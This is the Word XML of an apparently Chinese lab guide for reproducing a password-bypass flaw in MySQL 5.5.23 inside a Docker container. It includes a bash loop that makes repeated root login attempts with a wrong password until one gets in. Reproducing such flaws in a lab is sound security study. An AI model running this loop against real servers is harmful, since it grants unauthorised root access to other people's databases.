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525C24D3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2B4275" w:rsidRPr="002B4275">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mysql-5.5.23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，打开命令行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15217A30" w14:textId="0C78E579" w:rsidR="00DA0DBA" w:rsidRDefault="00B46137" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1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up -d</w:t>
      </w:r>
      <w:r w:rsidR="00EA3792">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431719C6" w14:textId="6DCDA087" w:rsidR="00EA3792" w:rsidRDefault="00B46137" w:rsidP="00DA0DBA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2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ps</w:t>
      </w:r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 w:rsidR="00ED272F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为3306</w:t>
      </w:r>
      <w:r w:rsidR="00D55412">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BECCEE" w14:textId="16BEA430" w:rsidR="00D74990" w:rsidRDefault="00D74990" w:rsidP="00DA0DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D74990">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现完成后使用命令docker-compose down关闭容器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35194BA3" w14:textId="490006FB" w:rsidR="003F5291" w:rsidRPr="00EA3792" w:rsidRDefault="00BC1FF4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484042B3" wp14:editId="4B43AD19">
            <wp:extent cx="5274310" cy="778510"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1828273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36FF372B" w14:textId="29333576" w:rsidR="00BC1FF4" w:rsidRDefault="00BC1FF4" w:rsidP="00BC1FF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker 中的 MySQL 运行在 192.168.233.153 目标机上，现在在另一台攻击机命令行执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F4BE0" w14:textId="722187BA" w:rsidR="00BC1FF4" w:rsidRPr="00BC1FF4" w:rsidRDefault="00BC1FF4" w:rsidP="00BC1FF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. 直接使用 mysql 命令连接攻击机上的 MySQL 可以看到如果不输入密码会报身份认证失败：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mysql -u root -p -h 192.168.233.153 -P 3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F63042" w14:textId="307673C2" w:rsidR="009628DA" w:rsidRDefault="00BC1FF4" w:rsidP="00BC1FF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. 在不知道密码的情况下，在攻击机中运行如下命令，在一定数量尝试后便可成功登录进 MySQL。这里&lt;target-ip&gt;为运行 MySQL 的目标主机的 IP 地址：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC1FF4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for i in `seq 1 1000`; do mysql -u root -P3306 -password=bad -h &lt;target-ip&gt; 2&gt;/dev/null;done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE91B6" w14:textId="7370AD63" w:rsidR="009628DA" w:rsidRPr="00B46137" w:rsidRDefault="00F031F3" w:rsidP="009628DA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F031F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B89A90" wp14:editId="2DE6A853">
            <wp:extent cx="5274310" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="662223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23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8DA" w:rsidRPr="00B461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75B32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AD48630"/>
    <w:lvl w:ilvl="0" w:tplc="74BA9F6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2899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86502"/>
    <w:rsid w:val="000D0CC9"/>
    <w:rsid w:val="0010685F"/>
    <w:rsid w:val="001F470D"/>
    <w:rsid w:val="0027506B"/>
    <w:rsid w:val="002B4275"/>
    <w:rsid w:val="0031149D"/>
    <w:rsid w:val="00353491"/>
    <w:rsid w:val="0035706B"/>
    <w:rsid w:val="003F5291"/>
    <w:rsid w:val="00490E7D"/>
    <w:rsid w:val="004A00AD"/>
    <w:rsid w:val="00553595"/>
    <w:rsid w:val="006F6E2C"/>
    <w:rsid w:val="00881BAE"/>
    <w:rsid w:val="009628DA"/>
    <w:rsid w:val="00B46137"/>
    <w:rsid w:val="00BB76DC"/>
    <w:rsid w:val="00BC10EC"/>
    <w:rsid w:val="00BC1FF4"/>
    <w:rsid w:val="00C66350"/>
    <w:rsid w:val="00D55412"/>
    <w:rsid w:val="00D74990"/>
    <w:rsid w:val="00DA0DBA"/>
    <w:rsid w:val="00DA5642"/>
    <w:rsid w:val="00DE0246"/>
    <w:rsid w:val="00DF4450"/>
    <w:rsid w:val="00EA3792"/>
    <w:rsid w:val="00ED272F"/>
    <w:rsid w:val="00F031F3"/>
    <w:rsid w:val="00F0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170</Words>
  <Characters>323</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>11</Lines>
  <Paragraphs>9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22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-27T14:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-04T12:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>